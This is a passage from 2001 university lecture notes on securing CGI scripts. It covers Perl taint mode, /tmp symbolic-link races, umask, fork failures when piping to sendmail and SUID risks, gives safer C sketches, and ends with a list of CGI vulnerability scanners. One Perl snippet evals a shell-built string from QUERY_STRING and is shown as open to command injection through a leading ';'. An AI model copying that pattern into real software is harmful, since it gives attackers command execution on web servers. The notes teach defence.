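                       char *errbuf, size_t errsize)
{
    int rc = regcomp(re, exp, REG_EXTENDED | REG_NOSUB);

    if (rc != 0) {
        regerror(rc, re, errbuf, errsize);
        return -1;
    }
    return 0;
}
```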
Perl provides a mechanism, originally a special version of Perl called "taintperl"
and in Perl 5 the -T command-line switch, that prevents user-supplied variables
(such as those from forms) from being used in eval(), system(), exec(), or piped
open() calls. Under this option Perl also refuses to call an external program
unless the PATH environment variable has been explicitly set at the
beginning of the script.
eval `echo $QUERY_STRING | awk 'BEGIN{RS="&"} {printf
"QS_%s\n",$1}' `
This clever little snippet takes the query string and converts it into a set of variable-assignment commands. Unfortunately, the snippet can be attacked by sending it a query string that starts with a ;.
[ack author]
Avoid writing to publicly writable directories (such as /tmp). Creating a directory in /tmp is acceptable, provided that programs can handle the directory disappearing between invocations of the CGI script. It is easy for malicious people to create symbolic links to important files or directories, so always make sure that the file you open is the file that you meant to modify.
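When a temporary file is unavoidable, the C library's mkstemp() addresses the symbolic-link problem: it chooses an unused name and creates the file as if with O_CREAT|O_EXCL, so an existing file or link with that name is never opened. A sketch, with a hypothetical wrapper name and a directory supplied by the caller:

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Create a new private temporary file in dir (e.g. "/tmp") and return a
 * read/write stream for it, or NULL. mkstemp() never opens an existing
 * file or symbolic link, and on current POSIX systems it creates the
 * file with owner-only permissions. The name used is left in path_out. */
FILE *make_private_temp(const char *dir, char *path_out, size_t path_size)
{
    int fd, n;
    FILE *f;

    n = snprintf(path_out, path_size, "%s/cgiXXXXXX", dir);
    if (n < 0 || (size_t)n >= path_size)
        return NULL;                   /* template would not fit */
    fd = mkstemp(path_out);            /* replaces XXXXXX in place */
    if (fd == -1)
        return NULL;
    f = fdopen(fd, "w+");
    if (f == NULL) {
        close(fd);
        unlink(path_out);
    }
    return f;
}
```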
The default umask of many httpds is 0; that is, any file created by a CGI script will be world-writable by default. The umask should probably be set to 022 (others may read the file but not write it) or 077 (group and others get no access at all).
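A C sketch of the umask advice (helper names hypothetical): after umask(077), a file the program creates with the customary mode 0666 ends up with mode 0600.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Call once at the start of the CGI program. Returns the previous mask. */
mode_t restrict_umask(void)
{
    return umask(077);   /* 022 would leave new files world-readable */
}

/* Create (or truncate) path asking for mode 0666; the umask trims the
 * bits of a newly created file. Returns the permission bits actually
 * set, or -1 on error. */
int create_and_report_mode(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);

    if (fd == -1)
        return -1;
    if (fstat(fd, &st) == -1) {
        close(fd);
        return -1;
    }
    close(fd);
    return (int)(st.st_mode & 0777);
}
```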
Users need to execute CGI scripts, but there is no reason for them to have read or write permissions. Similarly, users need to read the HTML driver files (and to read and execute their directory), but there is no need for them to have write or execute permission to the files (or write permission to their directory). These controls are most easily maintained as follows:
open (MAIL,"|-") || exec '/usr/lib/sendmail','-t','-oi';
Suppose the fork (in the open above) fails. open then returns an undefined
value, so the parent script itself executes the exec and becomes sendmail, whose
standard input is still connected directly to the client. It is possible to make
fork fail simply by overloading the server. Check for the success of the fork like this:
$pid = open(MAIL, "|-");
defined ($pid) || die "fork: $!";
if (!$pid) { exec('/usr/lib/sendmail', '-t', '-oi') or exit 255; }
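The same discipline in C, as a sketch with a hypothetical function name: fork() returning -1 is handled explicitly, so the parent can never fall through into the exec as it can with the unchecked Perl open.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>   /* for the caller's waitpid() */
#include <unistd.h>

/* Start argv[0] (an absolute path) with its standard input connected to
 * a pipe, and return a stream for writing to it, or NULL on any failure.
 * The child's pid is stored in *pid_out so the caller can waitpid(). */
FILE *open_pipe_to(char *const argv[], pid_t *pid_out)
{
    int fds[2];
    pid_t pid;
    FILE *f;

    if (pipe(fds) == -1)
        return NULL;
    pid = fork();
    if (pid == -1) {                   /* e.g. the server is overloaded */
        close(fds[0]);
        close(fds[1]);
        return NULL;
    }
    if (pid == 0) {                    /* child: read end becomes stdin */
        close(fds[1]);
        if (dup2(fds[0], STDIN_FILENO) == -1)
            _exit(255);
        close(fds[0]);
        execv(argv[0], argv);          /* only returns on failure */
        _exit(255);
    }
    close(fds[0]);                     /* parent keeps the write end */
    *pid_out = pid;
    f = fdopen(fds[1], "w");
    if (f == NULL)
        close(fds[1]);                 /* child sees EOF; caller still waits */
    return f;
}
```

For the example above, argv would be {"/usr/lib/sendmail", "-t", "-oi", NULL}; after writing the message, the caller closes the stream with fclose() and calls waitpid() on the returned pid.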
Making scripts SUID is dangerous if you can't trust the people who have access to the machine that the script is running on. SUID scripts have many more potential security holes than normal CGI scripts. On some operating systems it is impossible to have a secure SUID shell script. The simplest methods of attacking SUID scripts rely on setting environment variables maliciously. Almost all versions of csh are completely unsafe. (Older versions of PERL call csh to evaluate <*.h>, so never use that construct in a SUID PERL program; taint checks won't catch this problem.)
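One defense against environment attacks, sketched in C: never pass the inherited environment on to other programs, but exec them with a small fixed one. The variable list and function name are assumptions; a real SUID program would decide which variables it genuinely needs.

```c
#define _POSIX_C_SOURCE 200809L
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* A fixed, minimal environment (its contents are an assumption). Nothing
 * the invoking user set, such as PATH, IFS or LD_PRELOAD, is passed on. */
static char *const CLEAN_ENV[] = {
    "PATH=/usr/bin:/bin",
    NULL
};

/* Run path (an absolute path) with argv and only CLEAN_ENV. Returns the
 * program's exit status, or -1 on failure. */
int run_with_clean_env(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid == -1)
        return -1;
    if (pid == 0) {
        execve(path, argv, CLEAN_ENV); /* replaces the whole environment */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```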
The program CGIwrap is a good way to allow users to run CGIs under their own UID.
Current CGI vulnerability scanners check for as many as 200 vulnerable CGIs. Below is a list of cost-free scanners.
| Scanner | Description | Size |
|---|---|---|
| Sitescan | CGI scanner! Good if size matters! | 16Kb |
| ATLAS | CGI hole scanner! | 28Kb |
| Voideye | CGI vulnerability scanner! Scans 78 different vulnerabilities. | 163Kb |
| Whisker 3.1a | Scans for over 200 known CGI vulnerabilities. | 50Kb |
| CGI scan v2.0 | Scan your network for CGI exploits. (Some texts about CGI exploits are included in the .zip file.) | 50Kb |
| Webcheck | An excellent scanner, with a lot of options. | 263Kb |
| TWWWscanner 0.3 | Windows-based WWW vulnerability scanner that looks for 186 CGI vulnerabilities. Displays the HTTP header and server info, and tries for accurate results. | 263Kb |
| ShadowSecurityScanner v1.00.009 | A freeware security scanner that checks for 17 FTP, 22 SMTP, 10 POP3, and 132 CGI vulnerabilities. | 1164Kb |
| Nessus | | |
Acknowledgements: These lecture materials are gleaned from many sources. All are presented after careful reading. In some cases, I may have unintentionally neglected proper attribution; I assure the reader it is not because I claim authorship. Indeed, in these lectures there is hardly anything new that I have contributed. Suggestions for improvement are always welcome.
08/10/01 02:42:31 AM
Open Content Copyright © 2001 pmateti@cs.wright.edu